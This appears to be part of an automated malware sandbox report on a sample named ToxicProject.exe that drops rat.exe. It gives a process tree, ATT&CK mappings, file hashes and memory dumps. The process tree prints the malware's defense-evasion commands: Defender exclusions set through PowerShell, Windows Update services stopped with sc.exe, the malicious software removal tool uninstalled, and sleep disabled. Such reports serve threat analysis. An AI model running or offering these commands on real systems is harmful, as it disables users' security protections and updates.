  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:4504
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4660
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:4516
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:4388
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:4944
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1940
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:4080
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:2012
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:1528
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:3772
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:1472
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:1648
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3852

C:\Users\Admin\AppData\Roaming\rat.exe
C:\Users\Admin\AppData\Roaming\rat.exe
1⤵
- Executes dropped EXE
PID:2852

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4200
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:4080
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.0.1611655257\1720279581" -parentBuildID 20221007134813 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 20749 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {71098813-9c5f-4f85-bb41-3ad7683a1b79} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 1980 27ebf1d9f58 gpu
    3⤵
    PID:5048
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.1.1442319350\593086113" -parentBuildID 20221007134813 -prefsHandle 2352 -prefMapHandle 2348 -prefsLen 20785 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {13393a6e-8090-4b82-a649-15619ce23d51} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 2380 27eb2a6fe58 socket
    3⤵
    PID:2400
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.2.314782499\339331397" -childID 1 -isForBrowser -prefsHandle 3052 -prefMapHandle 2936 -prefsLen 20888 -prefMapSize 233444 -jsInitHandle 1404 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ca463bb-e605-4ab9-9088-ecfc3e1c2348} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 3236 27ec3398e58 tab
    3⤵
    PID:4880
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.3.1497111246\1997523443" -childID 2 -isForBrowser -prefsHandle 3596 -prefMapHandle 3592 -prefsLen 26066 -prefMapSize 233444 -jsInitHandle 1404 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {91945de4-3309-4cf2-968c-1ebb22623e05} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 3608 27ec34e8858 tab
    3⤵
    PID:2084
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.4.165103944\244073642" -childID 3 -isForBrowser -prefsHandle 4324 -prefMapHandle 4312 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1404 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8381634d-bdff-4975-ab2b-ec93b1b9b73c} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 4256 27ec53a2c58 tab
    3⤵
    PID:4996
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.5.1012855896\730331659" -childID 4 -isForBrowser -prefsHandle 5192 -prefMapHandle 5188 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1404 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {93a9a5a3-8bed-4246-8708-574a21bb5760} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 5200 27ec5241b58 tab
    3⤵
    PID:1964
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.6.1384896310\1203202476" -childID 5 -isForBrowser -prefsHandle 5336 -prefMapHandle 5340 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1404 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {90b33f18-34b0-4143-be29-46a76da5b5b5} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 5328 27ec5a8cb58 tab
    3⤵
    PID:4344
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.7.2021776662\1491771773" -childID 6 -isForBrowser -prefsHandle 5524 -prefMapHandle 5528 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1404 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a9712387-9af5-4a4a-93da-a82ac9f0c554} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 5520 27ec5a8d158 tab
    3⤵
    PID:432
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4080.8.783272929\412264622" -childID 7 -isForBrowser -prefsHandle 4256 -prefMapHandle 5504 -prefsLen 26285 -prefMapSize 233444 -jsInitHandle 1404 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7273a557-0a03-45d0-aeb7-7d7452f51ae8} 4080 "\\.\pipe\gecko-crash-server-pipe.4080" 5720 27ebf408d58 tab
    3⤵
    PID:5092

C:\Users\Admin\AppData\Roaming\rat.exe
C:\Users\Admin\AppData\Roaming\rat.exe
1⤵
- Executes dropped EXE
PID:4444

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\yhdrdrurzmhh\rykmnxwyylqw.exe

Filesize
545KB

MD5
9b09ff5cc0c2462dd14f674e1f19e133

SHA1
60d048fbb87403b78dfc02c4ae41c02dc37cfde6

SHA256
0013b33ad74cb8d9099a2352708d2224f74ec0e8082fd41c27d56664bc2b3d0a

SHA512
b55a00d2607d262c75ba809b11858437377cb790b5404fa8736d9e9f067faf675234e2964801610aa7f89311b7443ef12924f46597bc1c015743a4c0de6ed082

Download Submit
C:\ProgramData\yhdrdrurzmhh\rykmnxwyylqw.exe

Filesize
683KB

MD5
1e87174802b4dd63b376646ae2f62774

SHA1
ecf1be7c2bc1f577b48b207934a8c4927ac8ae7b

SHA256
ffe555ef5c0558b1176c210d8760299bc49d6f9b09b55b254a9263cc19b49821

SHA512
5deecb0c61d52f28f71708d26439eac1693036db1943e8b60c445d61439235dd4a9e7cd6b4ce22123451c3015da0d54b7d18e9fe9ea5aa6b6541f895e404fef0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\rat.exe.log

Filesize
654B

MD5
2ff39f6c7249774be85fd60a8f9a245e

SHA1
684ff36b31aedc1e587c8496c02722c6698c1c4e

SHA256
e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

SHA512
1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
22310ad6749d8cc38284aa616efcd100

SHA1
440ef4a0a53bfa7c83fe84326a1dff4326dcb515

SHA256
55b1d8021c4eb4c3c0d75e3ed7a4eb30cd0123e3d69f32eeb596fe4ffec05abf

SHA512
2ef08e2ee15bb86695fe0c10533014ffed76ececc6e579d299d3365fafb7627f53e32e600bb6d872b9f58aca94f8cb7e1e94cdfd14777527f7f0aa019d9c6def

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
ba169f4dcbbf147fe78ef0061a95e83b

SHA1
92a571a6eef49fff666e0f62a3545bcd1cdcda67

SHA256
5ef1421e19fde4bc03cd825dd7d6c0e7863f85fd8f0aa4a4d4f8d555dc7606d1

SHA512
8d2e5e552210dcda684682538bc964fdd8a8ff5b24cc2cc8af813729f0202191f98eb42d38d2355df17ae620fe401aad6ceaedaed3b112fdacd32485a3a0c07c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
77d622bb1a5b250869a3238b9bc1402b

SHA1
d47f4003c2554b9dfc4c16f22460b331886b191b

SHA256
f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb

SHA512
d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO0C034D27\ToxicProject.exe

Filesize
640KB

MD5
d0f390043bd9d850bd572eefb632d8ec

SHA1
131771b4de323f8ffeb162b0ffb78c3312f85d19

SHA256
38de9ce842d7d6a8196de3cef28eb26fff78d47656df236cad5c1e554cf694fa

SHA512
08986999d9bffcadfa08a84a3f6cfe59ecbce8f845f1072ba07182f79ee6a8a24a56cef0054ddc7a9529cca163719cf76d40122a1843744e91616fe91b51348d

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO0C034D27\ToxicProject.exe

Filesize
192KB

MD5
f5897fb9ccb05b36185ffbe8d894bc9b

SHA1
008aba022272c7a6420041d3da3adf88d6ad9850

SHA256
eeb3ec92da851ded63de3d264048601a6d8f12317fdc9919cd2776a76b128031

SHA512
aa05c9128b56ccb1c26f68eeefe5f460ac64f04c8b694484c4a7cfa3f099fe9b20ed7dcd8987b87015e9f234ed5f0896eeeb12659e888127d8ad70f40110f433

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zO0C034D27\ToxicProject.exe

Filesize
3.4MB

MD5
e851d6ca42ce03864898b1b0ba29bf70

SHA1
8e4ad1f97576955ab5ac8bc3664217ecc359735c

SHA256
acc03d1995cb5b7ccd78f6b39b2fb5afdf2a28f4d1f4f1415eb845a7a8be64d9

SHA512
24c525ea13e66e45471e81a7f7795e68e7823cf7d981e7d93acd20705e0d73886c5a25833f4567ca6eed03f2135168d4b93646ffe5ab38307d2e50778246a377

Download Submit
C:\Users\Admin\AppData\Local\Temp\OneCoreUAPCommonProxyStub.exe

Filesize
2.5MB

MD5
852289107d40fe8e2e1b9e3a49ec75b6

SHA1
d75c992e00f0b98c7cc1603c02b5edaf897c9cf1

SHA256
46c9e110d7f226a58ed6446bc9f1ef22999cbd30009ed7bf25f83c93bcf88b75

SHA512
262c9c1a2dea1cb7d1eeedd5c29dd569b60f51fdf5d8e85ed789a2ccc723aaa323e2384dd2fd61a77f8109dce754459473db71b1047c7c1dc7db6c879a335c8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\OneCoreUAPCommonProxyStub.exe

Filesize
2.6MB

MD5
7c14d590880406022bc0d8bdd3e2aa2c

SHA1
ffe66d0792a93e977f6366903cb349ac4cc6021c

SHA256
dbff26f5d4d1c5c35a636639161924c8bf6f8750be150fd1670092bd581a42ac

SHA512
c355ae4800a018a5651eb9222db16e7067cd2ec5a09fb619485441f4dd654dbb8d34051afb42622e086be0ad2a3aba46d8f9795a4c56f3e06b8bcd45fc1baf67

Download Submit
C:\Users\Admin\AppData\Local\Temp\PeerDistAD.exe

Filesize
229KB

MD5
afa8bb7e6708d4b5c056079f642b65f9

SHA1
3cadcd7a2da0bc26fd7912f46bdc692e51752913

SHA256
9041042642f5c0b67443490fc595aaaa1858c3a8582602969f1af568cad398e9

SHA512
46392d04c3827a9f1602685bae2b10a69306839ce3af5b51889a70925e48654e0b8793ae4f68a4ce94f7c7dc71d0d69f0437583417b32cef9619024294351ed4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lkytq1xv.h1g.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\nvdebugdump.exe

Filesize
4.6MB

MD5
c4e4f13d6fe24cf34aa691e217a9e69b

SHA1
14bb1d91832cd43b2fe9bd23c297cc450a1bc9c1

SHA256
41e9ba4ece59aa247a30b073a18911e1fa468a760b20466de991f81703c9217c

SHA512
38233bf68151c3a04aac86540b4e103ec6e3833e8d2ed0c7bf73b1cceb7517f3bc3bec2754f5e15520c71ece1b1b3140a8eeb7a728f3767e81df63b83f8f3a3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\nvdebugdump.exe

Filesize
2.9MB

MD5
8e76aef30a9f223756667c4b56843e0b

SHA1
c08229bbc821a5a408b99927cd6ee2345d80c8a2

SHA256
11a3758e13e7a6af2e0fdc4613e48d3415cf5d93c53ee75ca44910f2b54b085f

SHA512
6704b2edf4566d94e902036b90c6043fcd9b885f4ff1353d270ed3c04d4b11493422c65a6cb5453f94ba1307f8447b3b60a0ac7f9407dac3480c11d2f2f97c5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\nvdebugdump.exe

Filesize
2.5MB

MD5
6a39f7e17d98db23486710f70be765bd

SHA1
792c8eeae88bf131b2d602158e8e0555d8c3dde8

SHA256
376ce77bf87dfbf2e77745f5c07269d7734a660d17a3ad2831a806f489b7d327

SHA512
3471541bb100e3e02e2b17576df09eaa95b39b0707e8936f8fd1ccec3cfa7ac0211d504ff10e19c8244c16254935d3eab1339d311823fcfd3d6c279f43e5d570

Download Submit
C:\Users\Admin\AppData\Local\Temp\pautoenr.exe

Filesize
71KB

MD5
5adb580a8a93b829aefd180ab1773e19

SHA1
66f11192207b97a0e1d7df0d3a7080a555801d9a

SHA256
bf52359d6a85fd4df2d11603dfa1ccd90e432cdd19c64928791246cdb46ec03c

SHA512
1afabcc8b2963bd44eb9523e3d6f0957ed477a25292d1bcd4cd1188a62381fedf4d2d0d68b06b2f73b84d0b493ace4f9ee7f52b30ea264577e0e4c07f3927a04

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\datareporting\glean\db\data.safe.bin

Filesize
2KB

MD5
699622b2adea51b5d7ff51ca7b7a6bb1

SHA1
278c88ce290d1a3ec436f47502f15c2deeaf669a

SHA256
94e1c451fa5335fe8c4eacf9ebcb7be4cffd783493e669b76eb7a518a6f77b5a

SHA512
82f98d2920e6908b65cdb6c3133e8399f6f710da4a686d5b3808393957c700626c8afceec6cc2db2e834d48970f95da5ecc4c87b648546add628afea1c0d987a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\datareporting\glean\pending_pings\f0d5224e-746d-4de3-a508-76e94166a3aa

Filesize
746B

MD5
c80e1e8b66447bed1e06dad4d94ffbeb

SHA1
984ed63b0308e987bf60e71e43c3fb99e59b99d6

SHA256
c633df76e08caa30b883603a0a70810c2b722edd6a72aa0125f9562d306fff95

SHA512
a9ed0ecea2a8e60ba05ca6c4355fcfdd977fdde63e50af3c35bf4f3ae24e62cf42ab9982e4cf7aca01f22829c1436775ad7687a5c6ab2d69627a0cb72484ee0a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\datareporting\glean\pending_pings\ff8ed3b5-efe3-4712-a8ee-d55b6517f8c8

Filesize
11KB

MD5
199166922ae9b25c174e7278161b1448

SHA1
351712a5e67467fe7d8173aa16983629cfb69778

SHA256
a81061a3e823b2a75a98ba6127f4a41202fd7d1fe548576432dca3d0ac9523de

SHA512
9c992f0e75958b38693173fc4ea4899da2109409ce3f3bf18b764cd447c5b47e24f16d39ac20a71c13ec7cc9ba75a0e27065d6e828120a39af1882c1d2eec95e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\prefs-1.js

Filesize
6KB

MD5
81c11dfbefe8099f883e6bbf9eef65f6

SHA1
1450fda6a41fde94d9ff21413d757620b407f498

SHA256
c36b4a6507bc7f372ff90ce0fe19c23ce6463abd7ad80d532c2ebd89a3586db8

SHA512
80568bdd8f1cf684e1476d9b90429139ca1ffa9fba7a0b2e80b463f9674ea4947d0a1d13f102316af5f6e77eaab4586cc72dc68a154a6b90f1c67d675b61a85f

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\prefs-1.js

Filesize
6KB

MD5
25f63aa34ee0849d59af5703243de80c

SHA1
9f91b79ce14a32c1236fe0a58e83e82f8665dd06

SHA256
5bd22ff1ce0e1876f77007e0774149dc768636763e57f3950c769c4790db0d76

SHA512
1d59ebe7dd2ba3064dbfdef7f56b87f8fada314b7a2b6d5da1b74499c65b3519c049e675bbf95d7b0ae491776b051f50fe0cd3f860b274b5f8768a47600efc21

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\prefs.js

Filesize
6KB

MD5
26e093fb13e65888ef3ff2028edf3dc2

SHA1
3746183131826091bccb37396f30eb9285f86273

SHA256
d05574efc78f7112cc8fd3c432cdd3c4ddcbd7821d9b57f27e093f681ab1efee

SHA512
55c5b334b4bc038fd1a399bdcc534c55aa5e4614671d0028e67a6466f74688ef5c0f3cf7dea10b01779e4791d1c0ef25c53e50e0fc84d00e6ed4965e93ce601e

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
1KB

MD5
72b127c98a6a06395e282bba198d5c29

SHA1
5a850231132d89ab5215ad0f87987225fd5b0ce7

SHA256
256df55357c045acc352ec0cfe13bc30a6ef99c94a7ae74877f68f03897979ee

SHA512
36c7d3c6d114ef2859557fc6d9a218d78fa5f29b9d2ab363f75ac2ee721aa2d8e2a55de02cd7fec9474834cb96a632051b3019ff2005ffb25bfb02277744ff2a

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\sessionstore-backups\recovery.jsonlz4

Filesize
3KB

MD5
7263cb9650fd525ede18b7e06ca111ad

SHA1
79172704b02e86d27ac4d4ebfaa0ed1902c836c5

SHA256
5255b2f57b2aa9dc968288ba1643cb378aa188eefee2718da81e5ed3dd1abe3a

SHA512
9be9dcf50c72693da7122ea90a3c87e2b90bcce0de8d1f959358593cd25b63e370c919a2be6eb157c86cd7ccabc82954ace4516d3a90bb38eea7bdc083dd1127

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\92qyi9k9.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite

Filesize
184KB

MD5
feacfeaa6370d0dd460a0609e1e1435e

SHA1
1463da69f34d0efa56e61d9dd55ac1f435237b5b

SHA256
d57b87db93a487d521c52be8e0d599fcfb17e8012f6066c303f4e48e92c3f439

SHA512
61097d4419f67e7b364a5f0f3a248d801e0bbff2283ffce8cb89a5d43309145288c20ce1a6620217c81256db7da81de7d184a0c7eb769ea237902a5abbe5782b

Download Submit
C:\Windows\system32\drivers\etc\hosts

Filesize
1KB

MD5
b75ab2f570face3815db2e6d05351979

SHA1
61ae8f09bf3496ab1dfd5fb2993ca4af2a70994f

SHA256
59499ef13855667376f42becc9a1e6023b835887ff7f5f7fd05b0dbebe8b1b4d

SHA512
eb16ef330548ac8dbfb77dd1f2ba873c37325463cb6eafffc6a0a7293dc51d657ff0951546d450945cecb1d5b6774acab527cc97dcb6c977a2d7454798b0fa86

Download Submit
memory/624-110-0x0000024B63600000-0x0000024B63610000-memory.dmp

Filesize
64KB

Download
memory/624-114-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/624-109-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/624-111-0x0000024B63600000-0x0000024B63610000-memory.dmp

Filesize
64KB

Download
memory/1524-64-0x00007FFE45A90000-0x00007FFE45C85000-memory.dmp

Filesize
2.0MB

Download
memory/1524-60-0x00007FF646AD0000-0x00007FF6481C5000-memory.dmp

Filesize
23.0MB

Download
memory/1524-220-0x00007FFE45A90000-0x00007FFE45C85000-memory.dmp

Filesize
2.0MB

Download
memory/1524-149-0x00007FFE45A90000-0x00007FFE45C85000-memory.dmp

Filesize
2.0MB

Download
memory/1604-70-0x0000025B461F0000-0x0000025B46200000-memory.dmp

Filesize
64KB

Download
memory/1604-76-0x0000025B5E910000-0x0000025B5E932000-memory.dmp

Filesize
136KB

Download
memory/1604-68-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/1604-69-0x0000025B461F0000-0x0000025B46200000-memory.dmp

Filesize
64KB

Download
memory/1604-83-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/2636-13-0x0000000000770000-0x0000000001574000-memory.dmp

Filesize
14.0MB

Download
memory/2636-12-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/2636-14-0x00000000040F0000-0x0000000004100000-memory.dmp

Filesize
64KB

Download
memory/2636-57-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/2852-202-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/2852-204-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/3396-217-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/3396-219-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/3548-99-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/3548-95-0x0000014FF4FB0000-0x0000014FF4FC0000-memory.dmp

Filesize
64KB

Download
memory/3548-94-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/3548-96-0x0000014FF4FB0000-0x0000014FF4FC0000-memory.dmp

Filesize
64KB

Download
memory/3852-196-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3852-197-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3852-195-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3852-199-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3852-194-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/3852-193-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/4308-59-0x0000028432950000-0x0000028432960000-memory.dmp

Filesize
64KB

Download
memory/4308-54-0x0000028418410000-0x0000028418450000-memory.dmp

Filesize
256KB

Download
memory/4308-66-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/4308-58-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/4444-320-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/4444-305-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/4504-160-0x000001FAD58F0000-0x000001FAD5900000-memory.dmp

Filesize
64KB

Download
memory/4504-176-0x000001FAD58F0000-0x000001FAD5900000-memory.dmp

Filesize
64KB

Download
memory/4504-183-0x000001FAD68A0000-0x000001FAD68BA000-memory.dmp

Filesize
104KB

Download
memory/4504-190-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/4504-184-0x000001FAD6850000-0x000001FAD6858000-memory.dmp

Filesize
32KB

Download
memory/4504-186-0x000001FAD6890000-0x000001FAD689A000-memory.dmp

Filesize
40KB

Download
memory/4504-185-0x000001FAD6880000-0x000001FAD6886000-memory.dmp

Filesize
24KB

Download
memory/4504-182-0x000001FAD6840000-0x000001FAD684A000-memory.dmp

Filesize
40KB

Download
memory/4504-187-0x000001FAD58F0000-0x000001FAD5900000-memory.dmp

Filesize
64KB

Download
memory/4504-181-0x000001FAD6860000-0x000001FAD687C000-memory.dmp

Filesize
112KB

Download
memory/4504-177-0x000001FAD66F0000-0x000001FAD66FA000-memory.dmp

Filesize
40KB

Download
memory/4504-155-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
memory/4504-174-0x000001FAD6630000-0x000001FAD66E5000-memory.dmp

Filesize
724KB

Download
memory/4504-175-0x00007FF4273F0000-0x00007FF427400000-memory.dmp

Filesize
64KB

Download
memory/4504-172-0x000001FAD6610000-0x000001FAD662C000-memory.dmp

Filesize
112KB

Download
memory/4504-161-0x000001FAD58F0000-0x000001FAD5900000-memory.dmp

Filesize
64KB

Download
memory/4552-173-0x000000001BB30000-0x000000001BB40000-memory.dmp

Filesize
64KB

Download
memory/4552-67-0x000000001BB30000-0x000000001BB40000-memory.dmp

Filesize
64KB

Download
memory/4552-328-0x000000001BB30000-0x000000001BB40000-memory.dmp

Filesize
64KB

Download
memory/4552-55-0x0000000000DE0000-0x0000000000DF8000-memory.dmp

Filesize
96KB

Download
memory/4552-428-0x000000001BB30000-0x000000001BB40000-memory.dmp

Filesize
64KB

Download
memory/4552-56-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

Filesize
10.8MB

Download
